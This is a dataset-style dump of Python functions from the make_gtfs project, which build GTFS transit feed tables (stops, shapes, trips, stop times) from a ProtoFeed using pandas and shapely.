repository_name stringclasses 316 values | func_path_in_repository stringlengths 6 223 | func_name stringlengths 1 134 | language stringclasses 1 value | func_code_string stringlengths 57 65.5k | func_documentation_string stringlengths 1 46.3k | split_name stringclasses 1 value | func_code_url stringlengths 91 315 | called_functions listlengths 1 156 ⌀ | enclosing_scope stringlengths 2 1.48M |
|---|---|---|---|---|---|---|---|---|---|
mrcagney/make_gtfs | make_gtfs/main.py | build_shapes | python | def build_shapes(pfeed):
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat']) | Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L106-L137 | null | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | build_stops | python | def build_stops(pfeed, shapes=None):
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops | Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L139-L174 | [
"def build_stop_ids(shape_id):\n \"\"\"\n Create a pair of stop IDs based on the given shape ID.\n \"\"\"\n return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]\n",
"def build_stop_names(shape_id):\n \"\"\"\n Create a pair of stop names based on the given shape ID.\n \"\"\"\n ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | build_trips | python | def build_trips(pfeed, routes, service_by_window):
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id']) | Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L176-L225 | [
"def get_duration(timestr1, timestr2, units='s'):\n \"\"\"\n Return the duration of the time period between the first and second\n time string in the given units.\n Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).\n Assume ``timestr1 < timestr2``.\n \"\"\"\n valid_units = ['s', ... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
    """
    Given a ProtoFeed, return a DataFrame representing ``stops.txt``.

    If ``pfeed.stops`` is not ``None``, then return that.
    Otherwise, require built shapes output by :func:`build_shapes`,
    create one stop at the beginning (the first point) of each shape
    and one at the end (the last point) of each shape,
    and drop stops with duplicate coordinates.

    Note that this will yield one stop for shapes that are loops.
    """
    # User-supplied stops take precedence; return a defensive copy.
    if pfeed.stops is not None:
        return pfeed.stops.copy()

    if shapes is None:
        raise ValueError('Must input shapes built by build_shapes()')

    geo_shapes = gt.geometrize_shapes(shapes)
    records = []
    for shape, geom in geo_shapes[['shape_id',
      'geometry']].itertuples(index=False):
        ids = build_stop_ids(shape)
        names = build_stop_names(shape)
        # One stop at the start (t=0) and one at the end (t=1) of the shape
        for t in range(2):
            lon, lat = geom.interpolate(t, normalized=True).coords[0]
            records.append([ids[t], names[t], lon, lat])
    frame = pd.DataFrame(records,
      columns=['stop_id', 'stop_name', 'stop_lon', 'stop_lat'])
    return frame.drop_duplicates(subset=['stop_lon', 'stop_lat'])
def buffer_side(linestring, side, buffer):
    """
    Given a Shapely LineString, a side of the LineString
    (string; 'left' = left hand side of LineString,
    'right' = right hand side of LineString, or
    'both' = both sides), and a buffer size in the distance units of
    the LineString, buffer the LineString on the given side by
    the buffer size and return the resulting Shapely polygon.
    """
    result = linestring.buffer(buffer, cap_style=2)
    if buffer > 0 and side in ('left', 'right'):
        # Split the full-size buffer along the linestring using a tiny
        # sliver buffer, leaving one polygon on each side of the line.
        eps = min(buffer / 2, 0.001)
        sliver = linestring.buffer(eps, cap_style=3)
